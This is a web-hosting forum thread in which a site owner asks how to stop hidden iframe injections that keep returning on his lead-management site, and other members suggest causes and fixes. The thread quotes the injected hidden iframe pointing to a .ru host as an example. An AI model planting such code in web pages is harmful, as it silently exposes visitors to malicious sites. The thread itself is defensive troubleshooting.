Results 1 to 11 of 11
  1. #1
    Join Date
    Aug 2006
    Location
    USA/UK
    Posts
    112

    Thumbs up Iframe Virus .ru .cn

    Hey

    We are having some issues with one of our web sites, the web site is quite big over 24gigs, to login you need to login via a login script. The site is a lead management site.

    Over the last 3 days we have noticed that the login loads with an iframe, after looking at the code i notice there are tons of these iframe viruses in the code like

    Code:
    <div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
    They are in each of the index files of each sub directory of the site, i have downloaded the entire site, agent ransaked it and removed each line of code.. yet i re upload and after 30 minutes its back..

    How can i stop these viruses coming back each time i clean the pages? I have trried to chmodd to 444 as someone suggested but i am unable to change the files to anything other then 644.

    Please help, this is driving me crazy.

    Thanks
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  2. #2
    Join Date
    May 2008
    Location
    Citrus Heights, CA
    Posts
    1,887
    http://forums.tizag.com/showthread.php?t=15474

    I believe this was discussed here a few times as well.
    iWebFusion.Net - Shared / Reseller / VPS / Bare Metal / Colocation / IP Transit / Networking
    *Simply Hosting - Wholly owned networks, in-house staff, legions of fans!

  3. #3
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    This can be happening for a variety of reasons.

    1.) FTP access

    The accounts ftp password could have been obtained or bruteforced. This would allow the attacker to login and modify the account directly.

    2.) Rouge Php Script Exploit

    One of the scripts on that account, or even on another account could have an exploit which would allow the attacker to inject malicious code to do various things on the server.

    3.) PHP Shell

    There could be a php shell on the server somewhere from a previous attack. A php shell such as c99 can potentially give the attacker full access to the server via kernel exploits.


    It sounds like you need to have the entire server looked at and secured.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  4. #4
    Join Date
    Sep 2007
    Posts
    369

    *

    Quote Originally Posted by todo1419 View Post
    Hey

    We are having some issues with one of our web sites, the web site is quite big over 24gigs, to login you need to login via a login script. The site is a lead management site.

    Over the last 3 days we have noticed that the login loads with an iframe, after looking at the code i notice there are tons of these iframe viruses in the code like

    Code:
    <div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
    They are in each of the index files of each sub directory of the site, i have downloaded the entire site, agent ransaked it and removed each line of code.. yet i re upload and after 30 minutes its back..

    How can i stop these viruses coming back each time i clean the pages? I have trried to chmodd to 444 as someone suggested but i am unable to change the files to anything other then 644.

    Please help, this is driving me crazy.

    Thanks
    Martyn
    Better secure your server, install modsecurity, change all password as well, also take backup when you clean some site with date on server server, also setup good antivirus to do hourly scan so you come to know which files having problem, regular check your server logwatch, check your /var/log/messages, /var/log/secure, and apache logs, setup proper firewall implementation, turn on iptbles for ougoing ports, for incoming ports open for that when you required, it varies environment to environment. I know its hard initally to implement all this but once you implement all this, you are much much relax, and take a juice of apple then
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee

  5. #5
    Join Date
    Aug 2006
    Location
    USA/UK
    Posts
    112
    Thanks for the replys guys, really appreciate it.

    Im not really experienced with linux, so a server set up with the correct firewalls and security has been overlooked or they are outdated, and i honestly dont trust myself to do it.

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..

    Spent 8 hours today cleaning 4000 files of this code, and we didnt even build this script!

    Thanks again
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  6. #6
    Join Date
    Apr 2007
    Location
    United Kingdom
    Posts
    1,861
    Quote Originally Posted by todo1419 View Post

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..
    Steven from www.rack911.com should be able to do that for you.

  7. #7
    Quote Originally Posted by todo1419 View Post
    Thanks for the replys guys, really appreciate it.

    Im not really experienced with linux, so a server set up with the correct firewalls and security has been overlooked or they are outdated, and i honestly dont trust myself to do it.

    Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..

    Spent 8 hours today cleaning 4000 files of this code, and we didnt even build this script!

    Thanks again
    Martyn
    Virus attact is mostly to these files:
    index.php
    main.php
    footer.php
    index.html

    so make sure you clean these files properly or else, virus issue will be there again and change the FTP password. SET IT a very strong pw.
    Do include digits, sign and etc..)

    And you can also hire someone to do that make a thread in request section !)

  8. #8
    Join Date
    Aug 2006
    Location
    USA/UK
    Posts
    112
    Hey

    Yes that is what we did, after looking over 4000 files the code was in many files not just the index or main files but in sub directories of sub directories.. from 4000 there were 120 or so infected.

    I cleaned each, changed the passwords of the FTP and sql, re uploaded.. and then after around 30 minutes it was back in each file i had just cleaned!. So i ended up almost crying! The good part is that i have the cleaned files on my local PC, so i can upload these at will.. but i want to secure the server first and find out where this is coming from as simply reuploading the files is not really working for me.
    Last edited by M-Vizovi; 09-19-2009 at 06:21 PM.
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

  9. #9
    That sucks really. Very irritating . Hire a professional as soon as possible to do this work!

  10. #10
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    In the future you may want to scripting a find and replace, that way you can clean up the files with a single command for ALL files. You would still need to clean them up, but that at least helps clean it up quicker.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  11. #11
    Join Date
    Aug 2006
    Location
    USA/UK
    Posts
    112
    Hey

    We seem to have found the issue, it is the gumbler virus that is hidden in a clients PDF file, as soon as this file is read it activates the infection.

    A scripting idea would be awesome, but the url of the virus changes each time its activcvated ie: gxmbler.ru, bxxoxe-life.ru etc i guess we could search "iframe"

    Thanks
    Martyn
    “In the midst of chaos, there is also opportunity”
    ― Sun-Tzu, A Arte da Guerra

Similar Threads

  1. Replies: 8
    Last Post: 11-29-2008, 03:37 AM
  2. Help To Prevent From Iframe virus
    By rathin in forum Hosting Security and Technology
    Replies: 17
    Last Post: 06-01-2008, 10:31 AM
  3. Replies: 4
    Last Post: 03-17-2006, 12:58 AM
  4. <IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
    By rychen in forum Hosting Security and Technology
    Replies: 7
    Last Post: 03-12-2004, 01:29 PM
  5. Virus Alert: Albanian Virus
    By qm8309 in forum Web Hosting Lounge
    Replies: 6
    Last Post: 02-06-2004, 10:37 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •